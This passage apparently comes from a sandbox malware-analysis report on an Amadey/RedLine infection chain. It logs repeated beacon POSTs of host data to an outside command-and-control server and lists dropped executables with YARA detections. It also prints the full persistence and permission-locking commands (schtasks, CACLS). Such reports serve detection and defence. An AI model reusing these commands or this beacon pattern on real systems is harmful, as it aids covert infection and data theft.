                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:47.717269897 CET275INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:47 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            87192.168.2.44978262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:47.887595892 CET275OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:47.952157974 CET276INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:47 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            88192.168.2.44978362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:48.137742043 CET276OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:48.203149080 CET277INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:48 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            89192.168.2.44978462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:48.372469902 CET277OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:48.437582016 CET278INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:48 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            9192.168.2.44970462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:26.622936010 CET198OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:26.686882019 CET198INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:26 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            90192.168.2.44978562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:48.607664108 CET278OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:48.672290087 CET279INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:48 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            91192.168.2.44978662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:48.848860979 CET279OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:48.913948059 CET280INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:48 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            92192.168.2.44978762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:49.088687897 CET280OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:49.154936075 CET281INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:49 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            93192.168.2.44978862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:49.340408087 CET281OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:49.405584097 CET282INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:49 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            94192.168.2.44978962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:49.576297045 CET282OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:49.643573999 CET283INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:49 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            95192.168.2.44979062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:49.827327013 CET283OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:49.894879103 CET284INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:49 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            96192.168.2.44979162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:50.073107958 CET284OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:50.140377045 CET285INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:50 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            97192.168.2.44979262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:50.312285900 CET285OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:50.376621962 CET286INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:50 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            98192.168.2.44979362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:50.723015070 CET286OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:50.787786961 CET287INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:50 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            99192.168.2.44979462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:50.997870922 CET287OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:51.061672926 CET288INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:51 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:0
                            Start time:17:36:18
                            Start date:08/02/2023
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\Desktop\file.exe
                            Imagebase:0x10e0000
                            File size:582656 bytes
                            MD5 hash:3C86571F94AE2A9B196C945890C4D48A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.312037051.00000000052D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low

                            Target ID:1
                            Start time:17:36:18
                            Start date:08/02/2023
                            Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exe
                            Imagebase:0xa70000
                            File size:391680 bytes
                            MD5 hash:243D9E7FA50F53508036E1579B603367
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 51%, ReversingLabs
                            Reputation:low

                            Target ID:2
                            Start time:17:36:19
                            Start date:08/02/2023
                            Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exe
                            Imagebase:0x400000
                            File size:371200 bytes
                            MD5 hash:7A0C89DA78468AC421B2B1CD1A36DEE9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000003.384825400.0000000000540000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000003.384825400.0000000000540000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: ditekSHen
                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.415154394.0000000000607000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                            Antivirus matches:
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 36%, ReversingLabs
                            Reputation:low

                            Target ID:3
                            Start time:17:36:31
                            Start date:08/02/2023
                            Path:C:\Windows\System32\rundll32.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                            Imagebase:0x7ff7fc1d0000
                            File size:69632 bytes
                            MD5 hash:73C519F050C20580F8A62C849D49215A
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:4
                            Start time:17:36:39
                            Start date:08/02/2023
                            Path:C:\Windows\System32\rundll32.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                            Imagebase:0x7ff7fc1d0000
                            File size:69632 bytes
                            MD5 hash:73C519F050C20580F8A62C849D49215A
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:7
                            Start time:17:37:07
                            Start date:08/02/2023
                            Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                            Imagebase:0x1f0000
                            File size:11264 bytes
                            MD5 hash:7E93BACBBC33E6652E147E7FE07572A0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Antivirus matches:
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 82%, ReversingLabs
                            Reputation:moderate

                            Target ID:8
                            Start time:17:37:20
                            Start date:08/02/2023
                            Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                            Imagebase:0x1370000
                            File size:241664 bytes
                            MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000000.444881236.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
                            Antivirus matches:
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 81%, ReversingLabs

                            Target ID:9
                            Start time:17:37:21
                            Start date:08/02/2023
                            Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                            Imagebase:0xd50000
                            File size:241664 bytes
                            MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000000.446489289.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000009.00000002.834626616.000000000146C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000009.00000002.834626616.00000000013FA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000009.00000002.834626616.000000000143A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000002.834330424.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
                            Antivirus matches:
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 81%, ReversingLabs

                            Target ID:10
                            Start time:17:37:21
                            Start date:08/02/2023
                            Path:C:\Windows\SysWOW64\schtasks.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                            Imagebase:0xbc0000
                            File size:185856 bytes
                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:11
                            Start time:17:37:21
                            Start date:08/02/2023
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7c72c0000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:12
                            Start time:17:37:22
                            Start date:08/02/2023
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                            Imagebase:0xd90000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
